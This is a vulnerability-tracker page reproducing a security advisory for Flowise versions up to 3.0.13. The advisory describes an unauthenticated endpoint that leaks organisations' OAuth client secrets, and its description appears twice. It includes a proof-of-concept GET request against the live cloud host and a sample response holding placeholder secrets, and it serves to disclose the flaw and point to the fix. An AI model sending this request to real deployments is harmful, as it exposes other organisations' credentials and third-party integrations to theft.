Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.3
Flowise: Unauthenticated Access to Sensitive OAuth Credentials
GHSA-6pcv-j4jx-m4vx
Summary
Sensitive OAuth credentials can be accessed by anyone, putting organizations at risk of unauthorized access. This vulnerability allows unauthorized users to retrieve full SSO configurations, including client secrets, by sending a GET request to the /api/v1/loginmethod endpoint with an organization ID. To protect your organization, ensure that authentication is properly configured and restrict access to sensitive data.
What to do
- Update henryheng flowise to version 3.1.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | henryheng | flowise |
<= 3.0.13 Fix: upgrade to 3.1.0
|
Original title
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request
Original description
### Summary
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.
### PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.
Request
```http
GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json
```
Response: The server returns 200 OK with sensitive credentials:
```json
{
"providers": [
{
"id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "azure",
"config": {
"tenantID": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "google",
"config": {
"clientID": "123455",
"clientSecret": "123455"
},
"status": "enable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "auth0",
"config": {
"domain": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "github",
"config": {
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
}
],
"callbacks": [
{
"providerName": "azure",
"callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
},
{
"providerName": "google",
"callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
},
{
"providerName": "auth0",
"callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
},
{
"providerName": "github",
"callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
}
]
}
```
### Affected Deployments
- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed
### Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.
### PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.
Request
```http
GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json
```
Response: The server returns 200 OK with sensitive credentials:
```json
{
"providers": [
{
"id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "azure",
"config": {
"tenantID": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "google",
"config": {
"clientID": "123455",
"clientSecret": "123455"
},
"status": "enable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "auth0",
"config": {
"domain": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "github",
"config": {
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
}
],
"callbacks": [
{
"providerName": "azure",
"callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
},
{
"providerName": "google",
"callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
},
{
"providerName": "auth0",
"callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
},
{
"providerName": "github",
"callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
}
]
}
```
### Affected Deployments
- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed
### Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
ghsa CVSS3.1
5.3
Vulnerability type
CWE-306
Missing Authentication for Critical Function
CWE-312
Cleartext Storage of Sensitive Information
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026